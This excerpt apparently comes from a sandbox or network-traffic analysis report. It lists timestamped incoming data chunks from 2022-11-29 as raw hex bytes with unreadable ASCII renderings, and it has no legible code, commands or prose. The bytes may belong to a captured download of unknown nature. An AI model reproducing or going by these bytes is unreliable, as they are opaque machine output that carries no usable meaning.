7e 79 5d d6 6f 58 68 cd f2 77 29 d8 ff ff 02 f5 fc de Data Ascii: ;WM;"3l6'I^e8s11KuaxJfohm8c)?G,>N.0JboU+^H~XI]}l+;qj)6mo^mqQj$vZADgg+t(in+YnCWu9Y!:Qoi$#6Gs'@=g*Zn~y]oXhw)
2022-11-29 21:48:57 UTC	42	IN	Data Raw: 15 71 18 2b 61 27 fe 3a 11 dd 97 ce 97 cb 1c 9b b9 74 47 fb 20 00 7d 17 0f f1 f4 e3 1d 95 29 e1 58 93 82 bf 49 92 bc 34 01 57 7c 5c f9 4c 6b bf 34 63 2d f6 3b 30 8d 0e b3 dc ab 4d f6 79 af 0f 35 98 2e 3f c0 5a 8f b9 a3 cd 61 6b 16 9a 48 3f 00 2f a1 5b 5f c9 7d 7a ee 24 7f 2f 81 ce b7 c8 bc 52 06 be d5 2c a0 56 31 86 1f 4a 5d f3 11 68 0a 7b 66 2b 14 07 e4 52 ce 54 86 cb 23 1d 1b d2 3b 89 43 34 5d 00 4d ae 6f e3 ac c9 fa 91 67 8a bb 42 8b a8 8f 36 2b 19 54 4f 86 e0 4f 31 a9 0e 98 99 cc f5 1e 40 55 0b ae 4f d1 0f 04 3f 4f b3 64 2c 53 ca f3 99 67 d7 31 ac 0a 7d 00 66 bd 48 e7 89 dc b2 2b 5a 27 65 f3 1f c3 38 ce 55 4a b0 1d da 61 f1 b2 3a 30 1b cb 75 17 70 77 5b 76 de 09 94 1d 6e e6 23 80 94 5b b6 be e6 a7 80 68 2e 17 f1 37 ce 3b d2 1a c9 00 ff e4 c8 30 51 48 Data Ascii: q+a':tG })XI4W\|\Lk4c-;0My5.?ZakH?/[_}z$/R,V1J]h{f+RT#;C4]MogB6+TOO1@UO?Od,Sg1}fH+Z'e8UJa:0upw[vn#[h.7;0QH
2022-11-29 21:48:57 UTC	44	IN	Data Raw: 77 6d 0e 17 95 df 49 7d 4f a6 93 a9 9c b8 54 32 99 ec ff 45 a2 12 64 b0 ff fe bc de 22 57 12 af 00 ae e3 24 b4 a9 7c da 8d 54 02 d7 fe 04 57 5f 6b 59 6e 56 86 33 ed dd 1c 32 a9 0a a6 7c 19 d9 a1 7b 97 92 56 e8 58 af 96 c6 0b 8a 84 d0 cb b4 85 c2 6b 45 d0 a8 2b 7b 43 d8 d2 86 2a c4 eb b9 bd fc c6 75 16 98 f0 29 5c fe e3 10 53 4c 07 7a 5b d6 8c 77 c0 da 21 58 eb db 60 16 fa 9e b5 89 ae 44 54 c8 a2 5f fe 06 de fb 76 63 57 12 f7 19 9c 67 9a c5 1b ce 9d 08 db 36 c4 e2 64 05 1c 4e c5 70 c1 3a 54 19 d3 50 77 3d 46 93 b9 4f 66 1c 50 15 7f ed 86 63 27 f8 03 49 f6 39 cb bf d5 71 1c be 1b 89 d6 22 0c 89 0f 3b d7 ac 6b 1c 9f 23 de ba 80 95 a6 87 aa 36 4a 2d 56 6d 56 c0 4b 7e d0 bb 4a 7b f3 28 27 b4 19 a0 cc b7 4d b7 78 af 03 f8 85 1a 19 e6 4a 96 dc 27 e4 59 6d 05 82 Data Ascii: wmI}OT2Ed"W$\|TW_kYnV32\|{VXkE+{C*u)\SLz[w!X`DT_vcWg6dNp:TPw=FOfPc'I9q";k#6J-VmVK~J{('MxJ'Ym
2022-11-29 21:48:57 UTC	45	IN	Data Raw: 4e c1 dc f4 79 32 dd 67 d6 8b ea f2 c8 90 c8 9c 6c 42 7f 43 97 91 d6 77 8a 5c 97 ed 89 52 c8 94 ab eb 08 bd 1d b1 bf 8a 18 15 ef f7 db b3 52 77 17 d7 2c 7b 71 5d 7b eb 0d ee ec 13 23 b8 55 6a ea 0a 5a c8 09 55 47 e0 e0 0f 2c f5 7c ff 36 2c 22 11 b4 f7 bd 39 4b 91 b7 e0 07 7f c2 dc 33 46 0c 79 14 c5 55 98 d9 ae f4 1f ea ba 7e 32 d9 d0 fa 4e 03 7d 38 c1 d4 5d ee 78 81 c1 bb b2 c5 b2 f1 19 34 ec 7f ab 77 13 3f 8f 5e 6d 9c 8d bf 45 8f a1 17 1c ff c0 3f c9 1d 9c 85 6a 0c 17 7e 7c 89 43 e5 2e ef ca 6d 84 88 2a 5e b8 3b e1 0d 89 8f 0e 92 f1 f3 d2 74 4b 7d 43 c6 1e b9 98 a6 74 db fb ef f9 54 07 88 64 b0 f4 c5 2a cf 2a 4b 25 28 8c 91 e9 4b 0f 0a 6d d8 f6 cc 17 ff 51 13 38 d8 42 c7 64 39 02 38 33 c6 2a 1f b6 bb a5 76 0c af 3c 70 bf a0 5e f9 57 59 0b c0 21 81 bc 62 Data Ascii: Ny2glBCw\RRw,{q]{#UjZUG,\|6,"9K3FyU~2N}8]x4w?^mE?j~\|C.m^;tK}CtTdK%(KmQ8Bd983v<p^WY!b
2022-11-29 21:48:57 UTC	46	IN	Data Raw: 2c fe 38 e2 46 c9 00 62 b8 c8 30 8d 39 41 9b 7d d8 93 ed 8d 65 78 10 13 2f 75 2a d6 94 f8 7e 6c 1f 55 a5 9f e4 5b 12 9b a1 44 14 39 17 d2 a9 39 1f 73 ee ca d5 e4 e1 64 6e 1a 0b 36 88 54 78 44 1c a7 80 4b 1d cc 55 a9 cb 7a 1d de 18 47 4a df 97 44 85 fb b8 67 3c be aa 27 46 55 19 48 94 4c 09 b7 6b 65 df a1 7f 13 02 83 b2 be ca 4a 8e 35 ec b5 b6 f4 f9 3e f5 7d 0c a3 b1 8f 6d fb 17 d6 f4 36 7d 38 24 f3 9a 5d 37 a9 92 cc 59 65 15 5b 85 5b 88 27 55 e3 91 6f d0 af a9 e0 e8 41 d9 89 18 3f a0 d8 f0 aa d0 f8 c1 51 ea 6f 6a 68 ca fe a1 5b 5d cb e7 70 17 82 fa c7 87 e2 66 cd 0b c8 93 1c 41 68 df 8c bf 12 07 b8 5b 81 cf 50 5a df f1 92 d4 f2 b7 14 a6 c1 ad 31 db e6 fe de a1 2b 93 5f d6 26 7d 4e 5e 68 ed 10 f7 fe 13 36 ba 55 66 e0 88 4e c3 22 6c 45 e3 d9 d8 39 f7 d8 ff Data Ascii: ,8Fb09A}ex/u*~lU[D99sdn6TxDKUzGJDg<'FUHLkeJ5>}m6}8$]7Ye[['UoA?Qojh[]pfAh[PZ1+_&}N^h6UfN"lE9
2022-11-29 21:48:57 UTC	48	IN	Data Raw: 85 03 2f 0b 5a 8f b3 bf ec 48 63 8c 9c 9e 17 37 05 a0 4d 66 2c 7d 7a e8 57 bf 0c 81 ca a0 c1 b4 3c db bf e5 26 b5 75 ef 89 05 40 4e f6 1b 5c 1e 14 e5 2a 14 0d d5 8c cf 45 ff 61 4c c2 10 d8 37 98 8c 34 5d 0e 76 b3 55 6e aa e1 a6 83 6d e3 57 5a 89 a2 fd 92 e3 19 55 56 5d 9d 48 1b 9e 08 8b 95 d1 db 37 45 7d d6 73 4f d1 1e ca 3f 4f bd 23 d9 50 ca ff de 13 d6 31 ac 33 62 13 63 93 ff 2c 89 da d7 14 55 02 47 ab fd c2 32 c9 12 56 b2 1d d6 ae f7 a5 15 19 de c8 75 11 1f 90 5a 6a f6 66 78 06 6e ec 33 85 bc b3 b5 a2 ac c8 6f 73 2e 1d 9f ce ff 38 d8 6e 13 00 ff bc a7 16 42 3b 47 8a 6e f0 49 ee 97 63 17 3b 0a 1f 74 f4 37 bd cf 7e 01 15 7d 8c ec 58 51 cc 91 ba 66 b1 f3 17 d4 8b c9 78 8c 1b 1d 2b f1 f0 68 33 05 0b 36 83 50 bf 56 16 d4 93 6b 1e cd 3c e9 de 6c 3f d0 08 4f Data Ascii: /ZHc7Mf,}zW<&u@N\*EaL74]vUnmWZUV]H7E}sO?O#P13bc,UG2VuZjfxn3os.8nB;GnIc;t7~}XQfx+h36PVk<l?O
2022-11-29 21:48:57 UTC	49	IN	Data Raw: 7b 8c a8 59 f9 bf 86 0b c6 7f 80 ac 73 bb 08 83 ea fc 4f f8 19 01 e5 45 f0 12 ae bd ce c3 57 d1 46 c1 5d 38 f7 7c 22 74 63 f4 7f d4 65 e2 73 34 5e 98 61 e2 80 24 50 f0 d2 40 a6 fd 8a b4 7c a9 46 54 ce 82 d1 f7 10 c7 db d0 18 56 18 fc 0f bd 47 92 5f 1c fe 63 39 d8 36 c5 84 ff 2c 55 49 d6 74 0c 2a 60 35 90 3f 77 37 54 f3 7c 42 4e 2e 43 1f 4d 19 3d 63 27 e9 18 28 1a 97 c8 b5 fb 80 9b bf 11 9c fe 53 28 a1 19 2c ca c5 f2 18 b7 c3 ca 60 95 ed 2a 97 92 b0 66 60 47 7a 49 d4 73 8f bc 32 4d 6e e3 13 7f a4 17 bb cb 37 0a d9 7a af 03 fe 80 23 5e f6 5a 85 a5 34 cd b1 68 16 96 87 3a 2e ec a3 47 59 dc 6b 52 a1 25 63 07 96 5a 85 22 bf 53 00 ab f3 04 f5 1b 31 82 13 d0 75 d5 0a 58 03 14 12 29 14 01 ab 57 e6 ae f6 77 25 72 8e d8 3d fd 40 10 4c 02 74 bc 45 08 a9 e1 a0 87 71 Data Ascii: {YsOEWF]8\|"tces4^a$P@\|FTVG_c96,UIt`5?w7T\|BN.CM=c'(S(,`f`GzIs2Mn7z#^Z4h:.GYkR%cZ"S1uX)Ww%r=@LtEq
2022-11-29 21:48:57 UTC	50	IN	Data Raw: af 73 ca 09 52 5f e5 e2 0d 2c e4 da ff 34 54 ff 9d 8b fd ae 3e c2 aa a1 fd 14 f5 1a b6 0d 46 06 74 b1 dc 7a 6c d0 bf f6 14 e7 c2 db c5 d8 d0 f1 75 d3 6d 31 dd eb e5 ff 71 9c dc 36 a7 db 7c f4 81 34 e1 46 08 45 c3 eb 90 72 53 3b a1 9e 5e 8a 9f b5 34 ee ca e1 c3 ca a4 85 6a 17 3e 7a 7c 89 49 cd 11 ee 89 2e f0 94 30 5e a3 c4 f9 3d 8d fb 76 91 f1 e8 c5 6f 4a 6c 5f c6 08 90 c7 b1 5c 1a f8 fe ed 5c 9b 71 65 9c e8 c7 29 c9 af 3e 3a 38 01 bd e6 5a 01 be 63 ed 7f c9 0c b8 ba 12 38 d8 79 53 7b 2b 1b 20 ed c6 1d 28 a5 45 a4 50 0f bb 20 52 92 9c 5e ff 32 ad 09 c6 0d 9f 89 71 da b4 92 f8 e9 4c 2e a3 2f e2 55 cb d5 b1 b7 d7 f9 b3 c3 54 d8 66 e2 f6 50 21 4d fe e3 e5 d2 52 13 63 26 58 9c 65 d0 37 24 7c f3 a0 dd 8b fa 94 b3 ba 10 55 54 df 98 dd e8 f8 d5 ff e2 72 5d 0f 66 Data Ascii: sR_,4T>Ftzlum1q6\|4FErS;^4j>z\|I.0^=voJl_\\qe)>:8Zc8yS{+ (EP R^2qL./UTfP!MRc&Xe7$\|UTr]f
2022-11-29 21:48:57 UTC	52	IN	Data Raw: be 99 bf 0f c0 42 b0 cf 60 24 02 83 67 bf d2 9e 6c 61 20 b9 61 1e 0b 73 26 4c 4c 34 77 93 64 91 d8 11 6f f7 9a dd 02 04 ab 3b 25 e2 64 9d 30 c2 3d 9e da f3 16 3d 6a 22 ba b3 8d 54 c2 7b 05 f3 27 7b 3a 24 51 f5 7b 37 a9 89 d1 3c b0 1b 4c 59 60 18 36 5b f8 94 58 b8 59 39 13 f8 4b bc 82 d4 3c aa c9 6b e1 04 f9 c0 48 e9 4f 6d 6f dc db f2 49 48 a2 bc 67 3f c1 e8 cc 9b e4 f7 50 bb c1 40 60 5a 7a cf be 4d dd 04 b8 4c 9c f6 94 c1 f7 f0 80 ea 0e d8 17 a7 d0 ae 08 1e f4 ee 42 9c 31 bf 16 d1 49 9f 58 c4 71 fd f9 e4 a7 17 fb aa 5e 7d e3 1d 4b d9 02 45 44 7d 9e c3 3a f7 d4 f6 eb 54 c0 9d 8b fd b1 29 e2 91 a0 62 2d fc 71 50 0a 29 0f 79 b6 de 43 80 c0 af eb dd 64 8b fd 19 d9 d6 94 5e 0b 6c 3b 88 ef b4 ee 7a 87 c7 bd b5 dd a1 f6 95 bf 8a 9c 0e 77 19 22 44 38 8f 0c a1 94 Data Ascii: B`$gla as&LL4wdo;%d0==j"T{'{:$Q{7<LY`6[XY9K<kHOmoIHg?P@`ZzMLB1IXq^}KED}:T)b-qP)yCd^l;zw"D8
2022-11-29 21:48:57 UTC	53	IN	Data Raw: 44 02 5d 04 6f aa 67 90 16 e1 a6 98 6c a4 ab 5a 89 a2 57 5b e5 33 53 6f 58 ee 6b 09 9e 0e 98 93 c6 dd c1 ad 55 14 6a 4f d7 70 30 0e 4b b7 65 3a 51 ca 83 b1 3b c5 42 16 22 64 08 6c 93 9c 2d 89 da 90 3f 54 02 47 ec 02 c7 32 c5 55 c9 b2 1d d6 97 3b b4 10 3b 2f d5 71 17 76 59 7f 6a fc 03 8c 2f 82 e7 22 8a bc 4c b6 a2 a0 b4 8b 63 2b 3f c1 2c fe 32 ff 4d ba bc ff ba c2 3b 9d e6 41 9b 68 c9 96 c5 cb 65 78 17 05 16 5a cc 38 95 fe 56 e6 1c 55 b2 c4 05 5b 12 97 b8 68 d7 12 fe d7 81 f5 37 99 e7 e2 f3 cf bc 62 46 38 18 30 8b 54 58 44 1c a7 80 87 1d cc 55 96 83 6c 35 0a 0a 4f 49 fa 81 68 49 fe 90 41 10 23 ac 0f 11 46 1c 5f 82 63 9e 9f 4a 6b f7 96 57 31 0c ba 33 97 97 4a 9f 36 c8 3a be dc dd 14 37 7a 1a 81 8c 87 7c f9 6e 2b a6 45 55 29 2a cd ce 55 26 a0 92 c6 1e 49 16 Data Ascii: D]oglZW[3SoXkUjOp0Ke:Q;B"dl-?TG2U;;/qvYj/"Lc+?,2M;AhexZ8VU[h7bF80TXDUl5OIhIA#F_cJkW13J6:7z\|n+EU)*U&I
2022-11-29 21:48:57 UTC	54	IN	Data Raw: 53 ce 8a c3 ed 0e c5 db fe 78 46 1e 2a 92 8b 56 9a c4 b3 e6 43 1f c7 27 c5 47 f2 15 1a 9e 0c f2 20 2e 71 30 46 41 7f 23 41 88 97 e7 4e 24 5a 3d 64 30 3c 69 34 ff 03 43 f6 09 c8 bf d9 01 8b 97 f5 8e fb 2a 1b a5 c3 3d 03 dc cc 0c 98 0d 57 60 93 88 aa 87 ba 54 4b 2d 5c aa 47 e8 06 b3 ac 37 43 6a f0 13 d9 a4 17 bb 50 ce 22 3e 78 87 3d ea 96 01 1b e6 5c 98 65 bd e3 48 6d 07 99 a8 01 f9 fa 5f 4f 77 57 7d 7a e2 2e bd 1f a9 f7 ad c8 b6 7b 28 bc e5 2a b6 32 09 88 05 40 83 f2 0c 72 09 7b 7b 37 14 07 ba 52 ce 45 f5 77 23 1d 6b d9 3d f7 16 34 5d 04 77 b9 6d e3 b0 e1 a6 93 7c bc 94 5a 8f a9 89 59 9d 19 54 54 5a e4 68 0f f1 e8 99 93 ca c2 79 73 5d 03 67 20 da 70 2b 34 45 b1 64 a5 51 ca ff 99 50 d5 31 a0 2f 17 29 67 bb 2d 3c 8f cd be e1 7c 29 49 c4 19 d4 bf c4 7d 72 b1 Data Ascii: SxFVC'G .q0FA#AN$Z=d0<i4C=W`TK-\G7CjP">x=\eHm_OwW}z.{(*2@r{{7REw#k=4]wm\|ZYTTZhys]g p+4EdQP1/)g-<\|)I}r
2022-11-29 21:48:57 UTC	58	IN	Data Raw: 1d 1e 58 6a c4 02 7d 4e e7 93 77 88 32 ad 38 60 50 80 48 96 7b ba 97 eb 6f f7 90 e3 02 0f a5 1b 9f 35 4a 9f 30 58 3a b1 eb dc 00 ab 6d 0b b6 92 a7 fc f3 78 05 69 27 70 34 1b dd 41 4d 30 b6 b1 e2 c9 a1 15 5b 13 62 11 38 66 ff 1e 77 c6 b9 f2 cc 69 41 d3 a1 49 2d a7 c1 d3 a2 84 f9 c1 5b 60 4f 7f 66 f5 f6 ef 58 5d cd 6e 77 38 d4 cc d1 11 e4 fb c1 34 c6 cf ef 5c 6e c0 bf 88 b3 98 a9 5a 88 dd 9b 3a 43 ea 83 f5 33 a8 76 3a c1 a3 06 29 fa 92 44 a5 3a a4 2b c8 43 eb 48 c3 64 d5 18 c6 64 2a e4 a4 6a 73 87 1b 4c cf 16 14 4b 88 6d 19 3d e8 9f f1 11 a7 25 9a 94 b5 a2 4a 75 91 b7 e7 46 ee 10 cc 1d 41 13 3c a9 a7 ce 9a d6 a0 b9 14 91 3f e2 1a c6 96 e4 31 96 7d 36 c8 84 de 89 ed 87 d0 38 eb d3 cf 7b 94 22 fa 1e 11 57 8f 24 99 48 31 13 e9 02 45 80 a8 c6 2b ba 5c 2e c4 d2 Data Ascii: Xj}Nw28`PH{o5J0X:mxi'p4AM0[b8fwiAI-[`OfX]nw84\nZ:C3v:)D:+CHdd*jsLKm=%JuFA<?1}68{"W$H1E+\.
2022-11-29 21:48:57 UTC	63	IN	Data Raw: af 15 f4 4a cf 02 bd ad d7 e0 98 f2 4f d6 7e 1f e6 74 30 33 00 f4 7f d4 52 17 58 da 59 8d 7d 54 d8 2d 48 2c cd 40 9a f1 89 69 b2 08 56 5f df 9a f3 24 0f 5a 64 ff b9 40 ce 71 21 b4 56 9b d6 15 e6 4f 1e d2 20 57 80 ee 65 82 41 c1 6f 1b 39 78 bf 53 47 ad 1f 49 9d bf 48 65 10 58 9b c2 28 e4 74 fd ef c4 ca e1 97 c8 be c0 12 93 a9 0a 83 ed 28 84 14 31 36 d8 c3 e9 15 89 34 c5 68 1d 35 bd 19 25 92 56 2c 56 76 4c dd 4a 65 b3 26 58 77 fc b5 81 ad 99 06 ec 69 2b b0 ce b8 df fc 40 86 28 f7 5a 8e a0 ab f2 50 e5 a1 87 4c 2c 17 16 ad 6c 47 d8 78 6b e5 33 b9 04 90 cd 39 c0 ad 5e 11 64 71 4d 22 0b 3c 9f d3 59 50 e3 07 49 18 4a d8 3a 11 89 0d 45 14 52 23 fa 1c 1d 11 d9 2e f1 7a 24 58 8a d2 a1 b7 f0 b8 f2 a8 b9 35 9d 96 4b 87 3c 98 5d f2 17 c0 9f 4e c1 72 08 98 1f 96 82 c5 Data Ascii: JO~t03RXY}T-H,@iV_$Zd@q!VO WeAo9xSGIHeX(t(164h5%V,VvLJe&Xwi+@(ZPL,lGxk39^dqM"<YPIJ:ER#.z$X5K<]Nr
2022-11-29 21:48:57 UTC	64	IN	Data Raw: 31 c0 4e 9b 4a 39 42 cf ee a2 3c d4 20 ad 3b 9a 03 4a b2 0f 01 8b dc be f9 4e 11 4a c4 0e c4 2a 3d 7c 5e b9 35 aa bb f1 b2 1a 28 14 cc 75 06 77 6d a5 6b d0 05 8b 02 01 2d 22 80 9e 78 b0 bf b9 a0 8e 63 29 08 fb d2 ff 14 d8 57 cd 17 29 a9 cc 2f 4c 28 46 9b 79 df 84 13 96 49 7b 09 1b 18 72 3b 3c 8a f4 80 00 33 5f a5 e8 49 5d 20 b6 b4 61 cd 3d 17 c5 86 ec 16 8d e5 ce e7 e1 e8 0d 4a 3f 0b 3c ed e3 b3 47 16 8d 69 74 14 df 54 be cf 6b 2b f2 18 6b 53 c3 9b 7d 4d 97 5e 60 14 29 82 fe 4d 46 16 54 8e 6d 84 b0 6b 7e f0 8d 81 12 24 bf 1e 09 d4 59 98 30 d5 2c a0 0a f2 3a 34 6b 1f ae a2 96 7b ec 75 fb f4 1a 75 00 2f f3 d7 a3 c8 56 8b e8 2d 91 10 5b c1 72 16 27 da e9 82 77 b2 c1 c7 ec e3 52 d5 b0 d3 53 59 df e6 88 7a 9e c1 5b f8 d0 cf 7b 4d 61 78 82 8b da 24 eb 14 cb fb Data Ascii: 1NJ9B< ;JNJ*=\|^5(uwmk-"xc)W)/L(FyI{r;<3_I] a=J?<GitTk+kS}M^`)MFTmk~$Y0,:4k{uu/V-[r'wRSYz[{Max$
2022-11-29 21:48:57 UTC	68	IN	Data Raw: d1 eb 01 ff 71 9c dc 38 b9 e4 17 e7 85 2f cd cd 0a 77 15 1d 5e 57 7b 06 ad 96 7c a8 b7 8d 3e d7 67 3e c3 cd 89 ad 5b 17 3f 60 51 8e 4f c0 ca 74 cb 67 f0 9d 59 d3 a2 c5 ec 1e 8d ea 18 ba a6 ec bd 69 25 fa 48 d5 1c 85 9b b4 51 c7 85 ee ff 43 9c 9e 60 df 7d d7 22 d8 35 87 29 37 13 ab d1 07 0f a8 7c c1 e6 c9 06 c1 9b 9a 39 d2 6c 4a 62 11 44 33 ed dd 1e 33 90 be b2 13 96 ab 28 7c f8 02 5e f9 57 94 0c ce 23 a0 af 62 ce a5 85 c2 d1 45 d0 a8 2b ca 43 d8 d2 97 41 c4 eb b3 c3 41 ef 72 1c f7 57 3b 54 e5 fc 46 32 4d 07 70 25 50 99 5f 51 cd 25 56 ec 53 4f 8b fa 9f ab b5 17 6f f1 ce 8a c8 ea 2e 09 d0 e8 65 41 95 fb 1e b4 57 8e d1 05 df ee 08 db 3c eb 0f e9 04 16 59 d2 56 11 2f 71 37 f7 59 66 3f 41 b4 24 46 4e 22 46 98 72 30 3c 62 33 ec 06 6f 7b 97 c8 b5 c7 36 46 bc 1b Data Ascii: q8/w^W{\|>g>[?`QOtgYi%HQC`}"5)7\|9lJbD33(\|^W#bE+CAArW;TF2Mp%P_Q%VSOo.eAW<YV/q7Yf?A$FN"Fr0<b3o{6F
2022-11-29 21:48:57 UTC	72	IN	Data Raw: c7 36 fa 6c 3c 42 19 9b b8 41 ed 7a fd a6 92 65 a4 87 5a 89 a2 85 46 fd 14 54 4c 47 e5 94 18 b2 00 48 89 c0 dd 24 68 41 01 70 45 db 6e 27 33 4f be 54 c5 50 e6 f1 a5 37 cd 3c aa 2b 7b 19 98 ba 0b 27 b1 6e b9 f5 54 1d 51 c9 1f ca 2d cd 83 73 9c 13 00 9f f1 b4 12 19 13 cb 75 1d 7c 6e 54 67 fc 00 85 0e 90 e7 0e 99 44 0b b6 a2 ab 8f 9a 72 2e 1d 9f 0e fc 38 d8 42 a6 23 fd ba c2 3c 5f 31 4c 9b 61 c7 8a 13 96 49 6d 15 20 22 77 2a 3d 83 d0 50 01 1f 5f a2 ac 88 a5 ed 6e b4 76 d3 3a 1e cb 91 0d 1e 5f f6 e6 dd dc e4 62 40 28 23 18 82 7c b9 51 2f ee b7 7a 13 cc 5a a1 d2 92 34 20 11 7f 74 d3 9e 6c 56 f5 b5 61 1d 3c a7 d9 4d 6a 0e 5d b9 5e 92 b7 6d 79 df be 7f 13 02 ac 06 78 d5 44 92 30 cd 34 a0 0a f2 3a 25 78 24 94 a7 87 7a e5 50 2b f5 36 7d 3d 19 5b c2 4b 3a a9 8a dd Data Ascii: 6l<BAzeZFTLGH$hApEn'3OTP7<+{'nTQ-su\|nTgDr.8B#<_1LaIm "w*=P_nv:_b@(#\|Q/zZ4 tlVa<Mj]^myxD04:%x$zP+6}=[K:
2022-11-29 21:48:57 UTC	76	IN	Data Raw: ee 6a 25 8d 42 e8 2e 58 14 20 8b f7 bd a4 ef 9f d4 d8 8e f1 75 50 90 40 13 1d 96 7d 52 8b d1 23 fa 14 98 bc 8d 81 df cf 9c 42 38 f0 37 c8 ab e1 70 71 96 d7 bb a5 d3 c3 f8 eb b9 e3 48 64 6b 8f 33 81 3c 64 28 3d 98 4b eb 97 54 34 ee c0 a3 c5 d2 e3 9a 43 8b 39 75 12 a9 ed cd 17 ee 56 61 ef f5 0a fb a3 c5 ea 91 8f e4 6c b2 4f e8 bd 6f d6 7b 56 a4 05 8e 00 b4 43 68 e7 cc 63 45 95 fc 44 4d f5 d6 22 42 24 42 4e 18 ee ae e9 4b 92 ae 63 a5 c2 29 03 d7 f4 8f 3e cd 1c 46 28 a5 0e 2d 9a c8 00 ab 87 a4 dd 63 6b 36 2e 65 ee 87 00 65 5b 98 71 d9 53 1c aa 7d b3 94 78 ea f6 45 4c a4 1c 99 63 49 d8 ae bd 58 ed ac af 59 b3 e9 1a e8 02 08 b3 f4 f4 7f 42 4b 18 0f 14 c9 8d 77 ca 55 23 70 7a de 48 8b e5 fd 23 a7 23 c6 54 ce 8a dd 91 9a d2 f3 6a 63 57 18 e3 73 28 50 ba 46 11 f7 Data Ascii: j%B.X uP@}R#B87pqHdk3<d(=KT4C9uValOo{VChcEDM"B$BNKc)>F(-ck6.ee[qS}xELcIXYBKwU#pzH##TjcWs(PF
2022-11-29 21:48:57 UTC	80	IN	Data Raw: b3 48 5f d8 72 65 a9 da 62 21 92 c2 d6 0e bc 53 02 bd 61 bd a7 5a a8 81 05 4a 42 b0 19 57 09 6a 35 36 ea 06 96 7d cc 47 8e be 23 1d 15 ac bb f7 6c 34 5f 7f ac b9 6d e7 24 56 a1 44 70 5a 1e 71 89 a8 8b 71 ae 1b 54 4f 2c cc 6a 19 85 73 51 93 c0 d9 38 53 5a 01 61 40 c8 46 d5 3f 63 c0 4e 40 98 ca f5 b5 33 c5 35 7c ad 4f 02 66 b9 0f 63 88 dc b2 f7 2f c4 4d c4 1b c5 41 80 7f 72 ba 0c d5 cc b5 b6 10 3b 2f 87 77 17 7a 78 4d fc 8f 4d 98 07 64 ce 6e 82 94 61 bf b5 3c d4 ca 70 2e 1d d8 60 fc 38 d8 4f d1 96 8c fe ca 30 4a 13 0d 99 68 d2 9a f4 01 16 3c 13 08 15 5a 66 39 95 f2 56 46 1d 55 be e5 42 cd a5 fe b1 6d de 30 6a 02 81 f3 1b 6c dc f1 fa e7 f0 6d 59 75 f5 37 ae 71 a2 4b 0d af 96 9e 1a cc 53 a1 92 7f 3a 0c 08 48 5f cf 60 6d 65 eb ba 68 05 2a 3c 48 cf 47 1c 5f a8 Data Ascii: H_reb!SaZJBWj56}G#l4_m$VDpZqqTO,jsQ8SZa@F?cN@35\|Ofc/MAr;/wzxMMdna<p.`8O0Jh<Zf9VFUBm0jlmYu7qKS:H_`meh*<HG_
2022-11-29 21:48:57 UTC	84	IN	Data Raw: a0 86 5b d5 e3 eb 6e 09 b7 12 21 c3 aa 1b 17 e6 ef d6 da ea 3f 0c b8 a2 76 59 c2 08 a8 05 e6 f2 45 a5 b9 55 66 db cf 5f c8 03 56 2f 20 f1 08 3e 84 97 ec 31 31 1c d7 89 f7 b7 10 a2 82 b0 f2 6a 77 74 50 0a 60 1d 68 a1 02 41 9b c0 af ed 18 cf 2f f1 1f da a3 b8 5f 0a 66 2f bd b0 85 fd 71 9c ff 6b a1 cc a0 cf c2 27 e5 5d 14 18 97 34 9e 51 08 4f a3 9e 5e f9 f1 8f 34 e4 e8 77 c1 cd 84 87 11 d0 3f 6a 78 fa 00 cf 17 e4 e2 2d f2 9a 20 76 e8 c7 ea 07 e6 7d 1d 92 f7 ce aa 65 94 73 61 e2 1a a8 96 a4 56 32 c0 ef ff 49 54 8f 62 9a f5 d6 22 9f 3e 5d 3a 38 00 ae e9 4b 0e a8 7c b1 e5 d8 03 b6 f3 13 38 dc 6a 59 64 23 08 32 ec c4 3f 39 81 a4 a6 7c 1f 1d 28 7a 86 8e 4d f5 65 64 0b c6 0b 80 bd 6e d7 be 7d eb da 4e d7 b7 43 3d 43 d8 d8 b1 b6 d7 e7 b3 c3 4a d0 8b 1d db 7f 30 4f Data Ascii: [n!?vYEUf_V/ >11jwtP`hA/_f/qk']4QO^4w?jx- v}esaV2ITb">]:8K\|8jYd#2?9\|(zMedn}NC=CJ0O
2022-11-29 21:48:57 UTC	88	IN	Data Raw: 99 ba 4d 3b a8 7d 74 d3 4c 62 bf 35 53 85 f4 17 34 8e 15 9a 3f af 59 e7 79 af 01 c1 b4 09 14 8a 83 8f b3 aa cf 59 6b 16 83 a6 3a 06 1f a0 47 5f 0d 7d 7a f9 26 74 80 b3 c0 ad ca b6 55 10 bd e1 5f 0e 1b 31 8e a7 4c 58 da a3 59 09 7d 10 2b 14 14 8a 55 ce 5b f5 77 23 d9 11 d8 2c f5 7b b8 6f 04 65 bb 67 e5 bc e2 a2 97 69 88 e0 e9 88 a8 8f fb e5 17 51 6d f1 ef 6a 1f b4 0e 98 80 f0 de 26 fe 55 01 70 4f d7 71 2b 3c 67 a0 4c 3b 5b c8 e3 cc e6 d4 31 ae 20 72 7f b8 bb 27 2b 8b df c5 29 54 02 49 c6 1b ac 96 c2 7d 74 b2 6e 69 be f1 b2 7f 97 06 cb 73 15 58 c1 5a 6a fa 74 41 07 6e e2 20 fb 4f 6b b6 a6 d4 c4 8c 72 24 15 9f 8f ff 38 d4 35 ad 02 ff b0 a7 55 42 3b 4b 99 07 7b 92 ed 91 73 4b 0a 0a 1d 09 f1 3b 95 fc 11 67 1d 55 be 98 b6 5b 12 90 c4 0b dc 3a 1d bb 25 f2 1f 75 Data Ascii: M;}tLb5S4?YyYk:G_}z&tU_1LXY}+U[w#,{oegiQmj&UpOq+<gL;[1 r'+)TI}tnisXZjtAn Okr$85UB;K{sK;gU[:%u
2022-11-29 21:48:57 UTC	92	IN	Data Raw: 89 ed 3c a0 d4 38 82 2e f9 c1 5b fd 4e 78 79 c3 d6 6f 58 bf 2f f2 74 25 cb fb c6 9e c5 fe de 4a d9 9a 73 86 69 df 97 81 d6 2f 87 5d 90 fe 7a 5a f3 f3 82 85 be b6 14 a0 ca af 19 12 f2 00 d9 98 3f a3 1d d7 21 6f a7 c5 57 e5 04 89 87 39 e3 b1 20 5f f3 87 5f c2 10 5f 54 e0 e7 f6 3b db dc f9 3a 3b 33 87 75 f6 91 3a c2 82 9b 47 2f f1 75 43 3c 44 0c a2 b6 d4 52 47 d1 bf ed 1d ed a6 cb d1 d9 d0 fb 5d 1b 69 26 29 c2 ed fc 69 85 d2 27 b2 c9 b3 19 84 09 ee 54 0c 04 a7 34 9e 51 70 16 b2 9b 54 96 b2 97 ca ef ec 35 c5 ca f3 6e 6a 17 3b 71 6f 8c 49 dc 12 f6 34 66 dc 91 28 5d d0 71 eb 0d 8f f1 05 